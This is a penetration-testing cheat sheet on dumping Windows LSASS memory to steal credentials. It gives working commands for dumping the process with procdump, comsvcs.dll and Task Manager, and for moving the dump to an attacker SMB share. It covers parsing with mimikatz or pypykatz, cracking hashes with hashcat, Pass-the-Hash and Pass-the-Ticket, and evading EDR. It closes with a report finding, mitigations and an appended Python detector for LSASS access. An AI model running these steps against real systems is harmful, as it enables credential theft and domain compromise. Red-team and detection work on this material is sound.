🛡️ Methodology Checklist
- Confirm SYSTEM privileges before dumping
- Method 1 (procdump): `procdump.exe -accepteula -ma lsass.exe lsass.dmp`
- Method 2 (comsvcs.dll): `rundll32 C:\Windows\System32\comsvcs.dll, MiniDump [LSASS_PID] lsass.dmp full`
- Method 3 (Task Manager): right-click lsass -> Create dump file
- Transfer dump to attacker: `impacket-smbserver share . -smb2support`
- Parse with Mimikatz: `sekurlsa::minidump lsass.dmp; sekurlsa::logonpasswords`
- Extract hashes for PtH or offline cracking
🎯 Operational Context
Use when: SYSTEM or Admin access on a Windows target. Dump LSASS memory for NTLM hashes, Kerberos tickets, and potentially plaintext creds.
Think Dumber First: `rundll32 C:\windows\system32\comsvcs.dll, MiniDump [LSASS_PID] C:\Temp\lsass.dmp full` is the built-in Windows method, no external tool needed. Get the LSASS PID with `tasklist | findstr lsass`. Then parse the dump offline with mimikatz `sekurlsa::minidump`.
Skip when: Credential Guard is enabled. LSASS memory won't contain usable credential material.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `tasklist /svc` | Find lsass.exe PID (CMD) |
| `Get-Process lsass` | Find lsass.exe PID (PowerShell) |
| `rundll32 C:\windows\system32\comsvcs.dll, MiniDump [PID] C:\lsass.dmp full` | Dump LSASS memory to disk (requires elevated session) |
| `pypykatz lsa minidump /path/to/lsass.dmp` | Parse LSASS dump for credentials |
| `sudo hashcat -m 1000 [NT_HASH] rockyou.txt` | Crack extracted NT hash |
🔬 Deep Dive & Workflow
Why LSASS Is High Value
LSASS caches credentials in memory for every active logon session on the machine. Dumping it yields:
- NT hashes for every logged-in user
- Clear-text passwords on older systems (Windows XP-8 / Server 2003-2012) or if WDIGEST is re-enabled
- Kerberos tickets (usable for Pass-the-Ticket)
- DPAPI master keys for decrypting Chrome/Outlook/RDP credentials
Dump Method 1: Task Manager (GUI)
Requires an interactive graphical session:
- Open Task Manager -> Processes tab
- Right-click Local Security Authority Process -> Create dump file
- File saved to `%temp%\lsass.DMP`
Dump Method 2: comsvcs.dll (CLI, Shell-Friendly)
```
# Step 1: Get PID
tasklist /svc
# or
Get-Process lsass
# Step 2: Dump (elevated session required)
rundll32 C:\windows\system32\comsvcs.dll, MiniDump [PID] C:\lsass.dmp full
```
Note: This method is commonly flagged by AV/EDR. The comsvcs.dll approach is a Living-off-the-Land technique, but it is well known to defenders.
Parsing with Pypykatz
Transfer the .dmp file to the attack host, then parse:
```
pypykatz lsa minidump lsass.dmp
```
Output sections and what to extract:
| Section | Contents | Action |
|---|---|---|
| `== MSV ==` | SID, NT hash, SHA1 hash | Crack with Hashcat mode 1000, or use directly for PtH |
| `== WDIGEST ==` | Clear-text password (if enabled) | Use directly |
| `== Kerberos ==` | Domain tickets, ekeys, pins | Use for Pass-the-Ticket |
| `== DPAPI ==` | Master keys | Decrypt Chrome/Outlook/RDP stored credentials |
WDIGEST Context
WDIGEST stores clear-text credentials in memory for legacy digest authentication. Disabled by default since Windows 8.1/2012 R2 via the UseLogonCredential registry key. Attackers can re-enable it on a compromised host to capture the next logon.
Cracking When WDIGEST Is Disabled
Extract the NT hash from the MSV section of pypykatz output and crack offline:
```
sudo hashcat -m 1000 [NT_HASH] /usr/share/wordlists/rockyou.txt
```
Alternatively, use the NT hash directly for Pass-the-Hash without cracking.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| LSASS dump blocked by AV/EDR | PPL or EDR protection | Try: ProcDump, Task Manager full dump, or use custom LSASS dumper with syscall-based access |
| MiniDump fails with Access Denied | Not SYSTEM (admin not enough) | Elevate to SYSTEM first: PsExec64.exe -i -s cmd.exe or token impersonation |
| Mimikatz fails to parse dump | Dump incomplete or corrupted | Verify dump size; re-dump; use pypykatz on Linux as alternative parser |
| sekurlsa::logonpasswords shows only NTLM, no plaintext | WDigest disabled | Expected post-2013; focus on NTLM hashes for PtH; look for Kerberos tickets |
| Dump file too large to transfer | LSASS taking 500MB+ | Compress: Compress-Archive lsass.dmp lsass.zip; or parse on target and exfil only hashes |
Reporting Trigger
Finding Title: LSASS Memory Dump Yields NTLM Hashes and Kerberos Tickets
Impact: LSASS memory dump provides NTLM hashes for all interactively logged-on accounts including any Domain Admins, enabling Pass-the-Hash attacks and complete domain compromise without additional exploitation.
Root Cause: LSASS not protected by PPL or Credential Guard. SYSTEM access achieved without detection of the dump activity.
Recommendation: Enable Credential Guard on all Windows 10+ endpoints. Enable LSA protection (PPL) via registry. Deploy EDR with LSASS access monitoring. Alert on processes opening LSASS with PROCESS_VM_READ permissions.
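The last recommendation above (alert on processes opening LSASS with PROCESS_VM_READ) turned into detection logic, added here as an example and not part of the original page: it triages constructed Sysmon Event ID 10 (ProcessAccess) records, keeps only lsass.exe targets whose GrantedAccess includes PROCESS_VM_READ (0x10), drops an assumed allowlist of benign readers, and raises severity when the call trace shows dbghelp.dll or dbgcore.dll, where MiniDumpWriteDump lives and which every method on this page (comsvcs.dll, procdump, Task Manager) goes through. The tab-separated record format, the allowlist entries and the sample paths are assumptions made for the example.

```python
import re

PROCESS_VM_READ = 0x0010  # the access right the report recommends alerting on

# Benign LSASS readers on a typical host. This allowlist is an assumption made
# for the example and must be tuned per environment before use.
ALLOWLISTED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

def parse_event(line):
    """Parse one constructed, tab-separated key=value Sysmon Event ID 10 record."""
    return dict(part.partition("=")[::2] for part in line.split("\t"))

def classify(ev):
    """Severity of a ProcessAccess event against LSASS, or None if not alert-worthy."""
    if not ev["TargetImage"].lower().endswith(r"\lsass.exe"):
        return None
    if not int(ev["GrantedAccess"], 16) & PROCESS_VM_READ:
        return None  # no memory-read right requested, so no dump is possible
    if ev["SourceImage"].lower() in ALLOWLISTED_SOURCES:
        return None
    # MiniDumpWriteDump lives in dbghelp.dll/dbgcore.dll; either in the call trace
    # is the classic minidump signature (comsvcs.dll, procdump and Task Manager use it).
    if re.search(r"\\dbg(core|help)\.dll", ev.get("CallTrace", ""), re.IGNORECASE):
        return "high"
    return "medium"

def triage(lines):
    """Return (SourceImage, severity) for every record that warrants an alert."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        severity = classify(ev)
        if severity:
            alerts.append((ev["SourceImage"], severity))
    return alerts

# Constructed sample records (not real telemetry), modelled on Sysmon Event ID 10 fields.
SAMPLE_EVENTS = [
    "SourceImage=C:\\Windows\\System32\\csrss.exe\tTargetImage=C:\\Windows\\system32\\lsass.exe\tGrantedAccess=0x1000",
    "SourceImage=C:\\Windows\\System32\\rundll32.exe\tTargetImage=C:\\Windows\\system32\\lsass.exe\tGrantedAccess=0x1FFFFF\tCallTrace=C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4|C:\\Windows\\SYSTEM32\\dbgcore.DLL+2c7b",
    "SourceImage=C:\\Users\\bob\\tool.exe\tTargetImage=C:\\Windows\\system32\\lsass.exe\tGrantedAccess=0x1010\tCallTrace=C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4",
    "SourceImage=C:\\Program Files\\Windows Defender\\MsMpEng.exe\tTargetImage=C:\\Windows\\system32\\lsass.exe\tGrantedAccess=0x1010",
]
```

Running `triage(SAMPLE_EVENTS)` flags the rundll32.exe record as high and the unknown tool.exe record as medium, while the csrss.exe read without PROCESS_VM_READ and the allowlisted Defender engine produce nothing.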